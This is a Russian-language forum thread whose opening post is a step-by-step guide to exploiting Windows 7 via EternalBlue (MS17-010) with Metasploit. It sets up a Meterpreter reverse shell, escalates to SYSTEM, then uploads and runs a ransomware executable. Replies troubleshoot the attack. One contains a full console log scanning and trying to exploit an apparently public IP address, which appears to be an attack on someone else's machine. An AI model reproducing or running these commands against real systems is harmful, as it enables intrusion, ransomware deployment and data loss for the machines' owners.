• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья EternalBlue - Эксплуатация Windows PC

Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.

EternalBlue - Эксплуатация Windows PC


В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.

Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.

Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

> msfupdate

EternalBlue - Эксплуатация Windows PC


> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105

> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

> msf exploit(ms17_010_eternalblue) >exploit

EternalBlue - Эксплуатация Windows PC


Эксплоит срабатывает на отлично, получаем системные привилегии:

> getsystem

> getuid


EternalBlue - Эксплуатация Windows PC


Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)

EternalBlue - Эксплуатация Windows PC

> upload /root/ransomware.exe C:\\

> shell

> cd C:\\

> ransomware.exe

EternalBlue - Эксплуатация Windows PC


И как итог:

EternalBlue - Эксплуатация Windows PC


Вот собственно, и все. Спасибо за внимание.
 

Вложения

id2746

id2746

Grey Team
12.11.2016
363
603
отлично отработал на win7 x64, пробило с первого раза.
EternalBlue - Эксплуатация Windows PC


плюс настраивается быстрее чем даблпульсар и не требует wine.
Спасибо!
 
E

exe111

Спасибо за инфу. Несколько часов назад сам допер использовать payload windows/x64/meterpreter/reverse_tcp, а до этого просто получал cmd с правами пользователя, через bitsadmin файлы загружал, но, учитывая, что UAC включен - ничего особо не установишь
 
  • Нравится
Реакции: ArthurPatriot
valerian38

valerian38

Grey Team
20.07.2016
655
741
отлично отработал на win7 x64, пробило с первого раза. Посмотреть вложение 10207

плюс настраивается быстрее чем даблпульсар и не требует wine.
Спасибо!
Я так понимаю атака велась на непропатченую машину. Если будут закрыты 445, 135 порты, отключён SMBv1, этот вектор атаки возможно реализовать?
 
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 515
3 353
Я так понимаю атака велась на непропатченую машину. Если будут закрыты 445, 135 порты, отключён SMBv1, этот вектор атаки возможно реализовать?
Если все отключить то атаковать будет нечего =) Вернее ВНЕКУДА :)))
 
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Я так понимаю атака велась на непропатченую машину. Если будут закрыты 445, 135 порты, отключён SMBv1, этот вектор атаки возможно реализовать?
Можно даже не патчить, достаточно закрыть порты
[doublepost=1495632189,1495632124][/doublepost]
Решил попробовать данный метод и вылезает вот такая ошибка.
Apt-get update && apt-get upgrade не помогают?
 
Apton

Apton

Happy New Year
17.04.2017
45
141
К сожалению нет. Произвел полное обновление Kali, ничего не изменилось
 
debian2017

debian2017

Well-known member
09.04.2017
47
72
Хм апгрейдил msfconsole +дистрибютив да короче говоря все апнул ..но эксплойт не появился как и сканер(что за х?
 
  • Нравится
Реакции: Dat Sec
L

Leon

Вещь Классная! Забекапти эксплойт Вдруг за блочат чтоб был
 
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Вещь Классная! Забекапти эксплойт Вдруг за блочат чтоб был
Да он уже у каждого школоло на флешке, наверное.
[doublepost=1495793537,1495793515][/doublepost]


гуглил , сделал как сказано на других форумах , все так же не помогло
А что именно делал?
[doublepost=1495807006][/doublepost]
Ошибка при msfupdate
подскажите пожалуйста как исправить
Вот ссылка на мой пост на Kali форуме -
[doublepost=1495807135][/doublepost]


гуглил , сделал как сказано на других форумах , все так же не помогло
Это ссылка на инцидент на Github указывающий на этот баг -
 
  • Нравится
Реакции: Dat Sec
J

jsat

Active member
20.04.2017
32
9
Уважаемые ms17_010_eternalblue срабатывает только Windows 7 x64 ...
 
  • Нравится
Реакции: nynenado
1

1Sys-Admin1

Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/dark/.wine/drive_c/eternal11.dll
[doublepost=1495923249,1495923113][/doublepost]help
[doublepost=1495923290][/doublepost]root@kali2017:~# msfconsole

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on

=[ metasploit v4.14.21-dev ]
+ -- --=[ 1656 exploits - 947 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: ]

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_ms17_010) > set RHOSTS 185.34.20.132
RHOSTS => 185.34.20.132
msf auxiliary(smb_ms17_010) > run

[+] 185.34.20.132:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Professional 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > back
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT wlms.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path


Exploit target:

Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)


msf exploit(eternalblue_doublepulsar) > set RHOST 185.34.20.132
RHOST => 185.34.20.132
msf exploit(eternalblue_doublepulsar) > SET PROCESSINJECT explorer.exe
[-] Unknown command: SET.
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe
PROCESSINJECT => explorer.exe
msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 185.34.20.132 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path


Exploit target:

Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)


msf exploit(eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.88.249:4444
[*] 185.34.20.132:445 - Generating Eternalblue XML data
[*] 185.34.20.132:445 - Generating Doublepulsar XML data
[*] 185.34.20.132:445 - Generating payload DLL for Doublepulsar
[-] 185.34.20.132:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) > set WINEPATH /root/dark/.wine/drive_c/
WINEPATH => /root/dark/.wine/drive_c/
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.88.249:4444
[*] 185.34.20.132:445 - Generating Eternalblue XML data
cp: не удалось выполнить stat для '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
[*] 185.34.20.132:445 - Generating Doublepulsar XML data
cp: не удалось выполнить stat для '/root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
[*] 185.34.20.132:445 - Generating payload DLL for Doublepulsar
[-] 185.34.20.132:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/dark/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) > set WINEPATH /root/dark/.wine/drive_c/
WINEPATH => /root/dark/.wine/drive_c/
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.88.249:4444
[*] 185.34.20.132:445 - Generating Eternalblue XML data
cp: не удалось выполнить stat для '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: Нет такого файла или каталога
[*] 185.34.20.132:445 - Generating Doublepulsar XML data
cp: не удалось выполнить stat для '/root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
[*] 185.34.20.132:445 - Generating payload DLL for Doublepulsar
[-] 185.34.20.132:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/dark/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) > set WINEPATH /root/dark/.wine/drive_c/
WINEPATH => /root/dark/.wine/drive_c/
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.88.249:4444
[*] 185.34.20.132:445 - Generating Eternalblue XML data
[*] 185.34.20.132:445 - Generating Doublepulsar XML data
[*] 185.34.20.132:445 - Generating payload DLL for Doublepulsar
[-] 185.34.20.132:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/dark/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) > set WINEPATH/root/Eternalblue-Doublepulsar-Metasploit/.wine/drive_c/
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore

msf exploit(eternalblue_doublepulsar) >
 
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 515
3 353
cp: не удалось выполнить stat для '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleton.xml': Нет такого файла или каталога
<---- путь надо указать правильный! Посмотрите в эту тему на скриншоты ( и сами сюда скрины, а не метры тексты кидайте ) https://codeby.net/threads/eternalblue-doublepulsar-exploit-in-metasploit-win-7-hack.59593/
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб